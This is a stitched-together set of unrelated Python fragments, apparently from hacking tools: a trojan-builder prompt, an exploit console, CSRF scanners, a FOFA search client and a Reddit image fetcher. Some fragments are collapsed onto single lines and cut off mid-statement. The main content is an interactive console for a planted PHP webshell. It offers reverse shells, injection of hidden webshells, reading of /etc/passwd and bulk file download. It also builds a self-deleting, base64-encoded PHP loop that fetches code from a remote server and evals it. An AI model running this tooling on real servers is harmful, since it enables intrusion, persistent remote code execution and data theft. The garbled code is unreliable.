def main():
    """Interactive prompt of the trojan builder.

    Prints the banner and help once, then reads commands until ``exit``:
    ``make``/``m`` builds the trojan, ``h``/``?`` re-prints the help and
    anything else prints a hint.  ``Log.console`` is called on every
    iteration (it appears to print the prompt itself and return ``None``;
    the ``str(...).strip('None')`` turns that into an empty prompt string
    for ``raw_input``).
    """
    banner()
    help()
    while True:
        cmd = raw_input(str(Log.console("asist@AWD: ")).strip('None'))
        if cmd in ("make", "m"):
            make_trojan()
        elif cmd in ("h", "?"):
            help()
        elif cmd in ("exit", "e"):
            break
        else:
            print "help(?)"
def __init__(self):
    """Build every collaborator the object uses and keep it as an attribute.

    Each helper is instantiated unconditionally, in the same order as the
    original (``main`` first, ``storage`` last).  What the helpers do is
    defined elsewhere in the project.
    """
    self.main, self.io, self.tip = main(), io(), tip()
    self.execute, self.loader, self.config = execute(), loader(), config()
    self.badges, self.banner, self.storage = badges(), banner(), storage()
def __init__(self):
    """Instantiate the helper objects this component depends on.

    Construction order matches the original (``io`` first, ``exceptions``
    last); every helper is created on each instantiation.
    """
    self.io, self.tip, self.execute = io(), tip(), execute()
    self.loader, self.config, self.badges = loader(), config(), badges()
    self.banner, self.storage = banner(), storage()
    self.modules, self.exceptions = modules(), exceptions()
def __init__(self):
    """Instantiate the helper objects and resolve the history file path.

    ``self.history`` is read from ``self.config.path_config`` under
    ``['base_paths']['history_path']``, so ``config`` must be constructed
    before it; the remaining helpers are created in the original order.
    """
    self.io, self.tip, self.jobs = io(), tip(), jobs()
    self.execute, self.loader = execute(), loader()
    self.config = config()
    self.badges, self.banner, self.colors = badges(), banner(), colors()
    self.local_storage = local_storage()
    self.modules, self.exceptions = modules(), exceptions()
    # Path comes from the config object built above.
    self.history = self.config.path_config['base_paths']['history_path']
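def main():
    """Entry point: clear the screen, validate the subreddit, pick a category.

    Prompts until a choice in 1-5 is entered.  5 exits the process; any
    other valid choice is passed together with the validated subreddit to
    ``fetch_choices``.  Non-numeric input is reported as invalid instead of
    raising ``ValueError`` and crashing the prompt loop.
    """
    # Fixed command, so no shell is needed; a list argv avoids shell=True.
    subprocess.call(["clear"])
    print(banner())
    print()
    # Check the validity of the user-entered subreddit and assign it to sub
    sub = check_validity()
    # Category menu
    print("""%s[+] Wubba Lubba dub-dub! Select a Category: 1) Top 2) New 3) Hot 4) Rising 5) Exit """ % (green))
    # Loop until a valid category is selected
    while True:
        raw = input("%sEnter your choice: %s" % (green, reset))
        print()
        try:
            ch = int(raw)
        except ValueError:
            ch = None  # treated exactly like an out-of-range number below
        if ch in (1, 2, 3, 4, 5):
            if ch == 5:
                sys.exit()
            break
        print("%s[-] Invalid input detected please enter a valid input!" % (red))
        print()
    # Display image urls fetched for the chosen sub and category
    fetch_choices(ch, sub)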
from modules.morse import morse_decode from modules.utf import utf_decode from modules.nato import convert_nato from modules.octal import decode_octal from modules.netbios import decode_netbios from modules.binary import decode_binary from modules.reverse import reverse_string from modules.decimal import decode_decimal from modules.bacon import decode_bacon from modules import cracker except ModuleNotFoundError: message("!", "Please Run 'install.sh'!") exit(1) banner(0.0005) while True: try: CommandComplete() cmd = input(red("crypted") + gray(" » ")) if cmd != "": if cmd.split()[0] == "rainbow-crack": message("+", "Coming soon...") # RAINBOW TABLES if cmd.split()[0] == "rainbow-init": message("+", "Coming soon...") """
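def _prompt_shell_credentials():
    """Ask for the filename and password of a webshell to inject.

    Defaults: a random dot-prefixed ``.php`` name and a password derived
    from ``md5(md5(salt + name + salt))``.  Returns ``(filename, password)``.
    """
    default_filename = random_string(0x10, string.letters)
    default_password = md5(md5("%s%s%s" % (salt, default_filename, salt)))
    filename = raw_input("Filename (.%s.php): " % (default_filename)) or (".%s.php" % (default_filename))
    password = raw_input("Password (%s): " % (default_password)) or ("%s" % (default_password))
    return filename, password


def main():
    """Interactive console for an already planted PHP webshell.

    Usage: ``URL METHOD PASSWORD`` on the command line (exit code 1
    otherwise; exit code 2 when the webshell does not answer).  The three
    values are appended in clear text to ``Webshell.txt`` in the working
    directory, so that file is a credential store and must be protected.

    Every line that is not a known command is executed verbatim: on the
    local machine while ``setl`` is active (the default), or on the target
    after ``setr``.  A mistyped command therefore runs as a shell command.
    """
    banner()
    if len(sys.argv) != 4:
        show_help()
        exit(1)
    url = sys.argv[1]
    method = sys.argv[2]
    password = sys.argv[3]
    webshell = WebShell(url, method, password)
    LOCAL_COMMAND_FLAG = True
    if not webshell.working:
        Log.error("The webshell cannot work...")
        exit(2)
    # NOTE(review): plaintext URL/method/password log, appended forever.
    Log.info("recording this webshell to the log file...")
    with open("Webshell.txt", "a+") as f:
        log_content = "%s => %s => %s\n" % (url, method, password)
        f.write(log_content)
    main_help()
    while True:
        Log.context("sniper")
        context_fresh = raw_input("=>") or "h"
        context = context_fresh.lower()
        if context == "h" or context == "help" or context == "?":
            main_help()
        elif context == "sh" or context == "shell":
            shell = Shell(webshell)
            shell.interactive()
        elif context == "rsh" or context == "rshell":
            Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
            ip = raw_input("[IP] : (%s)" % (get_ip_address())) or get_ip_address()
            port = raw_input("[PORT] : (8888)") or "8888"
            Log.info("Starting reverse shell (%s:%s)" % (ip, port))
            webshell.reverse_shell(ip, port)
        elif context == "p" or context == "print":
            webshell.print_info()
        elif context == "pv" or context == "php_version":
            Log.success(webshell.get_php_version())
        elif context == "kv" or context == "kernel_version":
            Log.success(webshell.get_kernel_version())
        elif context == "c" or context == "config":
            Log.info("Detacting config files...")
            webshell.get_config_file()
        elif context == "fwd":
            webshell.get_writable_directory()
        elif context == "gdf":
            webshell.get_disabled_functions()
        elif context == "fwpf":
            webshell.get_writable_php_file()
        elif context == "fsb":
            webshell.get_suid_binaries()
        elif context == "setr":
            LOCAL_COMMAND_FLAG = False
        elif context == "setl":
            LOCAL_COMMAND_FLAG = True
        elif context == "dla":
            path = raw_input("Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            args = raw_input("Please custom find args (%s) : " % (" -size 500k")) or " -size 500k"
            Log.info("Using command : find %s %s" % (path, args))
            webshell.download_advanced(path, args)
        elif context == "dl":
            path = raw_input("Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            if not webshell.file_exists(path):
                Log.error("The file [%s] is not exists on the server!" % (path))
                continue
            if webshell.is_directory(path):
                Log.info("The target file is a directory, using recursion download...")
                filename_filter = raw_input("Input --name '%s' : " % ("*.php")) or "*.php"
                webshell.download_recursion(path, filename_filter)
            else:
                # NOTE(review): the remote path doubles as the local save
                # path, so an absolute remote path writes to the same
                # absolute path on this machine — confirm that is intended.
                Log.info("The target file is a single file, starting download...")
                webshell.download(path, path)
        elif context == "ps":
            hosts = raw_input("Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
            if "/" not in hosts:
                Log.error("Please use the format IP/MASK , if want to scan a single host , set MASK=32")
                continue
            ports = raw_input("Input ports (21,22,25,80,443,445,3389)") or "21,22,25,80,443,445,3389"
            webshell.port_scan(hosts, ports)
        elif context == "aiw":
            filename, password = _prompt_shell_credentials()
            webshell.auto_inject_webshell(filename, password)
        elif context == "aimw":
            filename, password = _prompt_shell_credentials()
            webshell.auto_inject_memery_webshell(filename, password)
        elif context == "fr":
            Log.info("Starting flag reaper...")
            webserver_host = raw_input("[IP] (%s) : " % (get_ip_address())) or get_ip_address()
            try:
                webserver_port = int(raw_input("[PORT] (80) : ") or "80")
            except ValueError:
                # A non-numeric port used to raise out of the console loop.
                Log.error("Port must be an integer!")
                continue
            filename = ".%s.php" % (random_string(0x10, string.letters))
            # PHP loop that polls our web server for code and eval()s it.
            file_content = "ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while(true){$code = file_get_contents('http://%s:%d/code.txt');eval($code);sleep(5);}" % (webserver_host, webserver_port)
            Log.info("Temp memory phpfile : %s" % (file_content))
            Log.info("Encoding phpfile...")
            file_content = '<?php unlink(__FILE__);eval(base64_decode("%s"));?>' % (file_content.encode("base64").replace("\n", ""))
            Log.info("Final memory phpfile : %s" % (file_content))
            result = webshell.auto_inject_flag_reaper(filename, file_content)
            if result:
                Log.success("Please check the web server(%s:%d) log to get your flag!" % (webserver_host, webserver_port))
                Log.info("Tips : tail -f /var/log/apache2/access.log")
            else:
                Log.error("Starting flag reaper failed!")
        elif context == "r" or context == "read":
            filepath = raw_input("Input file path (/etc/passwd) : ") or "/etc/passwd"
            webshell.read_file(filepath)
        elif context == "db" or context == "database":
            ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
            username = raw_input("Username (root): ") or "root"
            password = raw_input("Password (root): ") or "root"
            Log.info("Creating connection by [%s:%s] to [%s]..." % (username, password, ip))
            mysql_connection = Mysql(webshell, ip, username, password)
            if not mysql_connection.function:
                Log.error("The target server cannot support mysql!")
                continue
            if not mysql_connection.connection_flag:
                Log.error("Connection failed!")
                continue
            Log.success("Connection success!")
            if mysql_connection.function != "":
                Log.success("Entering database server interactive mode...")
                mysql_connection.interactive()
            else:
                Log.error("No supported database function!")
        elif context == "q" or context == "quit" or context == "exit":
            Log.info("Quiting...")
            break
        else:
            # Unknown input is run as a command, locally or on the target.
            Log.error("Unsupported function!")
            if LOCAL_COMMAND_FLAG:
                Log.info("Executing command on localhost...")
                os.system(context_fresh)
            else:
                Log.info("Executing command on target server...")
                webshell.auto_exec_print(context_fresh)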
yaml_name,cookies,HD,fRe,paths,Method,expression,datas,md5_path,md5 = parse.get_yaml("fingerprint/"+y) if yaml_name.split("-")[-1] != "md5" and "/" in paths and Method == "get" and fRe == False: if eval(expression): print(" "+yaml_name + ": "+url) wFile(yaml_name + ": "+url) if type_F == "first": fileL.remove(url) if type_F == "second" and sec_flag == False: sec_flag = True return if __name__ == '__main__': os.system('') banner.banner() if len(sys.argv) != 4: print('\n') print("Usage: python3 Frog-Fp.py win/linux -tL urls.txt") print("Usage: python3 Frog-Fp.py win/linux -dL ips.txt") exit() else: parser = argparse.ArgumentParser() parser.add_argument('os', help='win/linux') parser.add_argument('-tL', help='urls', default='') parser.add_argument('-dL', help='domains', default='') args = parser.parse_args() #根据系统设置二进制文件名 getsys(args.os)
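def handle_options(options: dict) -> None:
    """Act on parsed command-line options.

    Only ``version`` is handled: when it is truthy the banner is printed
    via ``exit`` and the process terminates.  A missing key counts as
    unset instead of raising ``KeyError``.
    """
    if options.get("version"):
        exit(banner.banner())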
data = { 'qbase64': base64.b64encode(query_str), 'email': self.email, 'key': self.key, 'size': size, 'fields': fields } req = requests.get(url, params=data, timeout=10) return req.json() except requests.exceptions.ConnectionError: error_msg = {"error": True, "errmsg": "Connect error"} return error_msg if __name__ == '__main__': banner() ips = [] fofa = FofaAPI(email, key) try: result = fofa.get_data(cmd.get("query"), cmd.get("size"), "host,ip,title") except: logger.INFO("search error!!") for host, ip, title in result['results']: if cmd.get("cidr"): ips.append(ip2cidr(ip)) logger.INFO("Host: {0} IP: {1} Title: [{2}]".format(host, ip, title) + " is FOUND!") num = num + 1 if cmd.get("cidr"):
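def main():
    """Top-level command loop of the framework (Python 2, ``raw_input``).

    Each iteration reads one line and dispatches to the ``core`` menus.
    The ``while`` loop already repeats the prompt, so the menus are no
    longer followed by a recursive ``main()`` call — the original re-entered
    ``main`` on every command and the stack grew until the process exited.
    ``exit`` leaves through ``core.banner.exits``; Ctrl-C prints a farewell
    and exits.
    """
    while True:
        try:
            PTF = raw_input("Pentest>> ")
            if PTF == 'use modules/exploits':
                core.menu.exploits()
            elif PTF == 'use modules/scanners':
                core.menu.scan()
            elif PTF == 'use modules/password':
                core.menu.pas1()
            elif PTF == 'use modules/post':
                core.menu.post()
            elif PTF == 'use modules/listener':
                core.menu.listener()
            elif PTF == 'use modules/exploitdb':
                core.menu.exploit_db()
            elif PTF == 'use modules/tools':
                core.menu.tools()
            elif PTF == 'shell':
                core.exploit.commands()
            elif PTF == 'show modules':
                core.help.modules()
            elif PTF == 'ipconfig':
                core.exploit.ip1()
            elif PTF == 'show options':
                core.help.help()
            elif PTF == 'update':
                core.exploit.update()
            elif PTF == 'about':
                core.banner.info()
            elif PTF == 'credits':
                core.banner.credits()
            elif PTF == 'banner':
                clean()
                banner()
                ptf()
            elif PTF == 'clear':
                core.menu.exploit.clean()
            elif PTF == 'exit':
                core.banner.exits()
                exit()
            else:
                print "Wrong Command => ", PTF
                print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
        except(KeyboardInterrupt):
            print("\n"+R+"[*] (Ctrl + C ) Detected, Trying To Exit ...\n" )
            time.sleep(2)
            print(""+G+"[*] Thank You For Using Pentest Framework =)\n" )
            time.sleep(3)
            exit()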
def Engine():
    """Run the CSRF scan against the target collected by ``inputin``.

    Two modes, selected by the module-level ``CRAWL_SITE`` flag: the single
    URL entered, or every page the ``Crawler`` reaches from it.  For each
    page the same pipeline runs: optional Referer/Origin header checks
    (``REFERER_ORIGIN_CHECKS``); then, for every form whose action has not
    been seen yet (``actionDone``) and only if ``FORM_SUBMISSION`` is on,
    two submissions with freshly generated inputs, optional cookie checks
    (``COOKIE_BASED``), anti-CSRF token entropy / encoding / tamper checks,
    and a POST-based check (``POST_BASED``) using a third submission built
    from the form as seen by a second session (``resp2``).  Results go to
    ``VulnLogger``/``NovulLogger``/``ErrorLogger`` and ``FORMS_TESTED``;
    ``GetLogger`` and ``Analysis`` summarise at the end, or on Ctrl-C.

    NOTE(review): ``csrf``, ``bs1``, ``bs2``, ``ref_detect`` and
    ``ori_detect`` are assigned but never read in this function.
    """
    os.system('clear')  # Clear the terminal
    banner()  # Print the banner
    banabout()  # The second banner
    web, fld = inputin()  # Take the input
    form1 = testFormx1()  # Get the form 1 ready
    form2 = testFormx2()  # Get the form 2 ready
    # Two independent cookie jars: one per simulated user session.
    Cookie0 = http.cookiejar.CookieJar()  # First as User1
    Cookie1 = http.cookiejar.CookieJar()  # Then as User2
    resp1 = build_opener(HTTPCookieProcessor(Cookie0))  # Process cookies
    resp2 = build_opener(HTTPCookieProcessor(Cookie1))  # Process cookies
    actionDone = []  # form actions already tested
    csrf = ''  # no token initialise / invalid token (unused below)
    ref_detect = 0x00  # Referer check flag (set, never read)
    ori_detect = 0x00  # Origin check flag (set, never read)
    form = Debugger.Form_Debugger()  # form parser + token generator
    bs1 = BeautifulSoup(form1).findAll('form', action=True)[0]  # sanity check of the sample forms
    bs2 = BeautifulSoup(form2).findAll('form', action=True)[0]  # same as above
    init1 = web  # starting page
    resp1.open(init1)  # prime session 1
    resp2.open(init1)  # prime session 2
    # Now there are 2 different modes of scanning and crawling here.
    # 1st -> Testing a single endpoint without the --crawl flag.
    # 2nd -> Testing all endpoints with the --crawl flag.
    try:
        # Implementing the first mode. [NO CRAWL]
        if not CRAWL_SITE:
            url = web
            response = Get(url).text
            try:
                verbout(O, 'Trying to parse response...')
                soup = BeautifulSoup(response)  # Parser init
            except HTMLParser.HTMLParseError:
                verbout(R, 'BeautifulSoup Error: ' + url)
            i = 0  # index of the current form on the page
            if REFERER_ORIGIN_CHECKS:  # Referer Based Checks if True...
                verbout(O, 'Checking endpoint request validation via ' + color.GREY + 'Referer' + color.END + ' Checks...')
                if Referer(url):
                    ref_detect = 0x01
                verbout(O, 'Confirming the vulnerability...')
                # We have finished with Referer Based Checks, lets go for Origin Based Ones...
                verbout(O, 'Confirming endpoint request validation via ' + color.GREY + 'Origin' + color.END + ' Checks...')
                if Origin(url):
                    ori_detect = 0x01
            # Now lets get the forms...
            verbout(O, 'Retrieving all forms on ' + color.GREY + url + color.END + '...')
            for m in Debugger.getAllForms(soup):  # iterating over all forms extracted
                verbout(O, 'Testing form:\n' + color.CYAN)
                formPrettify(m.prettify())
                verbout('', '')
                FORMS_TESTED.append('(i) ' + url + ':\n\n' + m.prettify() + '\n')
                # A form without an action attribute gets the page itself as action.
                try:
                    if m['action']:
                        pass
                except KeyError:
                    m['action'] = '/' + url.rsplit('/', 1)[1]
                    ErrorLogger(url, 'No standard form "action".')
                action = Parser.buildAction(url, m['action'])  # absolute action URL
                if not action in actionDone and action != '':  # skip empty and duplicate actions
                    # If form submission is kept to True
                    if FORM_SUBMISSION:
                        try:
                            # Two submissions with independently generated inputs,
                            # pretending to be two different users.
                            # NOTE: Slow connections may cause read timeouts which may result in AttributeError
                            result, genpoc = form.prepareFormInputs(m)  # prepare inputs as user 1
                            r1 = Post(url, action, result)  # make request with token values generated as user1
                            result, genpoc = form.prepareFormInputs(m)  # prepare inputs as user 2
                            r2 = Post(url, action, result)  # again make request with token values generated as user2
                            # Go for cookie based checks
                            if COOKIE_BASED:
                                Cookie(url, r1)
                            # Go for token based entropy checks...
                            try:
                                if m['name']:
                                    query, token = Entropy(result, url, r1.headers, m.prettify(), m['action'], m['name'])
                            except KeyError:
                                query, token = Entropy(result, url, r1.headers, m.prettify(), m['action'])
                            # Now its time to detect the encoding type (if any) of the Anti-CSRF token.
                            fnd, detct = Encoding(token)
                            if fnd == 0x01 and detct:
                                VulnLogger(url, 'Token is a string encoded value which can be probably decrypted.', '[i] Encoding: ' + detct)
                            else:
                                NovulLogger(url, 'Anti-CSRF token is not a string encoded value.')
                            # Go for token parameter tamper checks.
                            if (query and token):
                                txor = Tamper(url, action, result, r2.text, query, token)
                            o2 = resp2.open(url).read()  # make request as user2
                            try:
                                form2 = Debugger.getAllForms(BeautifulSoup(o2))[i]  # user2 gets his form
                            except IndexError:
                                verbout(R, 'Form Index Error')
                                ErrorLogger(url, 'Form Index Error.')
                                continue  # Making sure program won't end here (dirty fix :( )
                            verbout(GR, 'Preparing form inputs...')
                            contents2, genpoc = form.prepareFormInputs(form2)  # prepare for form 3 as user3
                            r3 = Post(url, action, contents2)  # make request as user3 with user3's form
                            # txor is only bound when a token was found; 'not query' short-circuits otherwise.
                            if (POST_BASED) and ((not query) or (txor)):
                                try:
                                    if m['name']:
                                        PostBased(url, r1.text, r2.text, r3.text, m['action'], result, genpoc, m.prettify(), m['name'])
                                except KeyError:
                                    PostBased(url, r1.text, r2.text, r3.text, m['action'], result, genpoc, m.prettify())
                            else:
                                print(color.GREEN + ' [+] The form was requested with a Anti-CSRF token.')
                                print(color.GREEN + ' [+] Endpoint ' + color.BG + ' NOT VULNERABLE ' + color.END + color.GREEN + ' to POST-Based CSRF Attacks!')
                                NovulLogger(url, 'Not vulnerable to POST-Based CSRF Attacks.')
                        except HTTPError as msg:  # if runtime exception...
                            verbout(R, 'Exception : ' + msg.__str__())  # again exception :(
                            ErrorLogger(url, msg)
                actionDone.append(action)  # add the stuff done
                i += 1  # Increase user iteration
        else:
            # Implementing the 2nd mode [CRAWLING AND SCANNING].
            verbout(GR, "Initializing crawling and scanning...")
            crawler = Crawler.Handler(init1, resp1)  # Init to the Crawler handler
            while crawler.noinit():  # Until 0 urls left
                url = next(crawler)  # Go for next!
                print(C + 'Testing :> ' + color.CYAN + url)  # Display what url its crawling
                try:
                    soup = crawler.process(fld)  # Start the parser
                    if not soup:
                        continue  # Making sure not to end the program yet...
                    i = 0  # index of the current form on the page
                    if REFERER_ORIGIN_CHECKS:  # Referer Based Checks if True...
                        verbout(O, 'Checking endpoint request validation via ' + color.GREY + 'Referer' + color.END + ' Checks...')
                        if Referer(url):
                            ref_detect = 0x01
                        verbout(O, 'Confirming the vulnerability...')
                        # We have finished with Referer Based Checks, lets go for Origin Based Ones...
                        verbout(O, 'Confirming endpoint request validation via ' + color.GREY + 'Origin' + color.END + ' Checks...')
                        if Origin(url):
                            ori_detect = 0x01
                    # Now lets get the forms...
                    verbout(O, 'Retrieving all forms on ' + color.GREY + url + color.END + '...')
                    for m in Debugger.getAllForms(soup):  # iterating over all forms extracted
                        FORMS_TESTED.append('(i) ' + url + ':\n\n' + m.prettify() + '\n')
                        # A form without an action attribute gets the page itself as action.
                        try:
                            if m['action']:
                                pass
                        except KeyError:
                            m['action'] = '/' + url.rsplit('/', 1)[1]
                            ErrorLogger(url, 'No standard "action" attribute.')
                        action = Parser.buildAction(url, m['action'])  # absolute action URL
                        if not action in actionDone and action != '':  # skip empty and duplicate actions
                            # If form submission is kept to True
                            if FORM_SUBMISSION:
                                try:
                                    result, genpoc = form.prepareFormInputs(m)  # prepare inputs as user 1
                                    r1 = Post(url, action, result)  # make request with token values generated as user1
                                    result, genpoc = form.prepareFormInputs(m)  # prepare inputs as user 2
                                    r2 = Post(url, action, result)  # again make request with token values generated as user2
                                    if COOKIE_BASED:
                                        Cookie(url, r1)
                                    # Go for token based entropy checks...
                                    try:
                                        if m['name']:
                                            query, token = Entropy(result, url, r1.headers, m.prettify(), m['action'], m['name'])
                                    except KeyError:
                                        query, token = Entropy(result, url, r1.headers, m.prettify(), m['action'])
                                        ErrorLogger(url, 'No standard form "name".')
                                    # Now its time to detect the encoding type (if any) of the Anti-CSRF token.
                                    fnd, detct = Encoding(token)
                                    if fnd == 0x01 and detct:
                                        VulnLogger(url, 'String encoded token value. Token might be decrypted.', '[i] Encoding: ' + detct)
                                    else:
                                        NovulLogger(url, 'Anti-CSRF token is not a string encoded value.')
                                    # Go for token parameter tamper checks.
                                    if (query and token):
                                        txor = Tamper(url, action, result, r2.text, query, token)
                                    o2 = resp2.open(url).read()  # make request as user2
                                    try:
                                        form2 = Debugger.getAllForms(BeautifulSoup(o2))[i]  # user2 gets his form
                                    except IndexError:
                                        verbout(R, 'Form Index Error')
                                        ErrorLogger(url, 'Form Index Error.')
                                        continue  # making sure program won't end here (dirty fix :( )
                                    verbout(GR, 'Preparing form inputs...')
                                    contents2, genpoc = form.prepareFormInputs(form2)  # prepare for form 3 as user3
                                    r3 = Post(url, action, contents2)  # make request as user3 with user3's form
                                    # txor is only bound when a token was found; query == '' short-circuits otherwise.
                                    if (POST_BASED) and ((query == '') or (txor == True)):
                                        try:
                                            if m['name']:
                                                PostBased(url, r1.text, r2.text, r3.text, m['action'], result, genpoc, m.prettify(), m['name'])
                                        except KeyError:
                                            PostBased(url, r1.text, r2.text, r3.text, m['action'], result, genpoc, m.prettify())
                                    else:
                                        print(color.GREEN + ' [+] The form was requested with a Anti-CSRF token.')
                                        print(color.GREEN + ' [+] Endpoint ' + color.BG + ' NOT VULNERABLE ' + color.END + color.GREEN + ' to P0ST-Based CSRF Attacks!')
                                        NovulLogger(url, 'Not vulnerable to POST-Based CSRF Attacks.')
                                except HTTPError as msg:  # if runtime exception...
                                    verbout(color.RED, ' [-] Exception : ' + color.END + msg.__str__())  # again exception :(
                                    ErrorLogger(url, msg)
                        actionDone.append(action)  # add the stuff done
                        i += 1  # Increase user iteration
                except URLError as e:  # network-level failure for this page
                    verbout(R, 'Exception at : ' + url)  # again exception -_-
                    time.sleep(0.4)
                    verbout(O, 'Moving on...')
                    ErrorLogger(url, e)
                    continue  # make sure it doesn't stop at exceptions
                # This error usually happens when some sites are protected by some load balancer
                # example Cloudflare. These domains return a 403 forbidden response in various
                # contexts. For example when making reverse DNS queries.
                except HTTPError as e:
                    # Only 403 is handled; any other HTTPError is swallowed here.
                    if str(e.code) == '403':
                        verbout(R, 'HTTP Authentication Error!')
                        verbout(R, 'Error Code : ' + O + str(e.code))
                        ErrorLogger(url, e)
                        quit()
        GetLogger()  # The scanning has finished, so now we can log out all the links ;)
        print('\n' + G + "Scan completed!" + '\n')
        Analysis()  # For Post Scan Analysis
    except KeyboardInterrupt as e:  # user wants to exit (while crawling)
        verbout(R, 'User Interrupt!')
        time.sleep(1.5)
        Analysis()  # For Post scan Analysis
        print(R + 'Aborted!')  # say goodbye
        ErrorLogger('KeyBoard Interrupt', 'Aborted')
        GetLogger()  # The scanning has interrupted, so now we can log out all the links ;)
        quit()
def main():
    """Interactive exploit console (Python 2, ``raw_input``).

    Commands: ``h``/``help``/``?``, ``version``, ``show`` (lists every
    ``<vendor>/<module>.py`` under ``./exploit/``), ``use <module>`` (imports
    the module by the dotted name typed, instantiates ``module.Exploit()``
    and enters a per-module prompt with ``set KEY VALUE``, ``options``,
    ``info``, ``exploit`` and ``back``/``quit``), and ``q``/``quit``/``exit``.

    Anything else is reported as unsupported and then, because
    ``LOCAL_COMMAND_FLAG`` is never cleared, passed verbatim to
    ``os.system`` — every unrecognised line is a local shell command.
    ``use`` imports whatever name the user types, so it loads arbitrary
    importable modules, not only those under ``./exploit/``.
    """
    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)
    banner()
    LOCAL_COMMAND_FLAG = True  # never set to False in this function
    CONTEXT = reset_context()
    while True:
        command = (raw_input("[%s]=> " % (color.red(CONTEXT))) or "help")
        if command == "h" or command == "help" or command == "?":
            main_help()
        elif command == "version":
            Log.info("Version: 0.0.1")
        elif command == "show":
            print "%s" % (color.purple("------\t\t------"))
            print "%s" % (color.purple("Vendor\t\tModule"))
            print "%s" % (color.purple("------\t\t------"))
            exploit_path = "./exploit/"
            vendors = os.listdir(exploit_path)
            for vendor in vendors:
                full_path = exploit_path + vendor
                if os.path.isdir(full_path):
                    exploit_files = os.listdir(full_path)
                    number = 0  # counted but not printed
                    for exploit_file in exploit_files:
                        if exploit_file.endswith(".py") and exploit_file != "__init__.py":
                            # One or two tabs so the module column lines up.
                            if len(vendor) > 8:
                                print "%s" % (color.cyan("%s\t%s" % (vendor, exploit_file.replace(".py", ""))))
                            else:
                                print "%s" % (color.cyan("%s\t\t%s" % (vendor, exploit_file.replace(".py", ""))))
                            number += 1
        elif command.startswith("use "):
            module_name = command.split(" ")[1]
            Log.info("Loading module: %s" % (module_name))
            try:
                module = importlib.import_module(module_name)
            except Exception as e:
                Log.error(str(e))
                continue
            CONTEXT = module_name
            exploit = module.Exploit()
            exploit.show_info()
            Log.info("%s" % ("-" * 0x40))
            exploit.show_options()
            # Per-module prompt until back/quit.
            while True:
                module_command = (raw_input("[%s]=> " % (color.red(CONTEXT))) or "help")
                if module_command == "help":
                    main_help()
                    continue
                if module_command.startswith("set "):
                    if len(module_command.split(" ")) == 3:
                        key = module_command.split(" ")[1]
                        value = module_command.split(" ")[2]
                        exploit.set_config(key, value)
                    else:
                        Log.error("Check your input!")
                        Log.info("Example: \n\tset [KEY] [VALUE]")
                elif module_command == "options":
                    exploit.show_options()
                elif module_command == "info":
                    exploit.show_info()
                elif module_command == "exploit":
                    try:
                        exploit.exploit()
                    except Exception as e:
                        Log.error(str(e))
                elif module_command == "quit" or module_command == "q" or module_command == "exit" or module_command == "back":
                    break
                else:
                    main_help()
            CONTEXT = reset_context()
        elif command == "q" or command == "quit" or command == "exit":
            Log.info("Quiting...")
            break
        else:
            Log.error("Unsupported function!")
            # Fall-through: the unrecognised line runs as a local shell command.
            if LOCAL_COMMAND_FLAG == True:
                Log.info("Executing command on localhost...")
                os.system(command)
def Engine():
    """Crawl the target entered via ``inputin`` and test every form for CSRF.

    Pages come from ``Crawler.Handler`` seeded with the start URL and the
    first session (``resp1``).  Per page: optional Referer/Origin header
    checks (``REFERER_ORIGIN_CHECKS``), optional cookie checks
    (``COOKIE_BASED``), then for every form whose action has not been seen
    (``actionDone``) and only if ``FORM_SUBMISSION`` is on: two submissions
    with generated inputs, anti-CSRF token entropy and tamper checks, and a
    POST-based check (``POST_BASED``) using a third submission built from
    the form as the second session (``resp2``) sees it.  ``Analysis``
    summarises at the end or on Ctrl-C.

    NOTE(review): ``csrf``, ``bs1``, ``bs2``, ``ref_detect`` and
    ``ori_detect`` are assigned but never read in this function.
    """
    os.system('clear')  # Clear the terminal
    banner()  # Print the banner
    banabout()  # The second banner
    web = inputin()  # Take the input
    form1 = form10()  # Get the form 1 ready
    form2 = form20()  # Get the form 2 ready
    # Two independent cookie jars: one per simulated user session.
    Cookie0 = http.cookiejar.CookieJar()  # First as User1
    Cookie1 = http.cookiejar.CookieJar()  # Then as User2
    resp1 = build_opener(HTTPCookieProcessor(Cookie0))  # Process cookies
    resp2 = build_opener(HTTPCookieProcessor(Cookie1))  # Process cookies
    actionDone = []  # form actions already tested
    csrf = ''  # no token initialise / invalid token (unused below)
    ref_detect = 0x00  # Referer check flag (set, never read)
    ori_detect = 0x00  # Origin check flag (set, never read)
    init1 = web  # get the starting page
    form = Debugger.Form_Debugger()  # form parser + token generator
    bs1 = BeautifulSoup(form1).findAll('form', action=True)[0]  # sanity check of the sample forms
    bs2 = BeautifulSoup(form2).findAll('form', action=True)[0]  # same as above
    action = init1  # First init
    resp1.open(action)  # prime session 1
    resp2.open(action)  # prime session 2
    verbout(GR, "Initializing crawling and scanning...")
    crawler = Crawler.Handler(init1, resp1)  # Init to the Crawler handler
    try:
        while crawler.noinit():  # Until 0 urls left
            url = next(crawler)  # Go for next!
            print(C + 'Crawling :> ' + color.CYAN + url)  # Display what url its crawling
            try:
                soup = crawler.process(web)  # Start the parser
                if not soup:
                    continue  # Making sure not to end the program yet...
                i = 0  # index of the current form on the page
                if REFERER_ORIGIN_CHECKS:  # Referer Based Checks if True...
                    verbout(O, 'Checking endpoint request validation via ' + color.GREY + 'Referer' + color.END + ' Checks...')
                    if Referer(url):
                        ref_detect = 0x01
                    verbout(O, 'Confirming the vulnerability...')
                    # We have finished with Referer Based Checks, lets go for Origin Based Ones...
                    verbout(O, 'Confirming endpoint request validation via ' + color.GREY + 'Origin' + color.END + ' Checks...')
                    if Origin(url):
                        ori_detect = 0x01
                if COOKIE_BASED:
                    Cookie(url)
                # Now lets get the forms...
                verbout(O, 'Retrieving all forms on ' + color.GREY + url + color.END + '...')
                for m in Debugger.getAllForms(soup):  # iterating over all forms extracted
                    action = Parser.buildAction(url, m['action'])  # absolute action URL (KeyError if no action attribute)
                    if not action in actionDone and action != '':  # skip empty and duplicate actions
                        # If form submission is kept to True
                        if FORM_SUBMISSION:
                            try:
                                result = form.prepareFormInputs(m)  # prepare inputs
                                r1 = Post(url, action, result).text  # make request with token values generated as user1
                                result = form.prepareFormInputs(m)  # prepare the input types
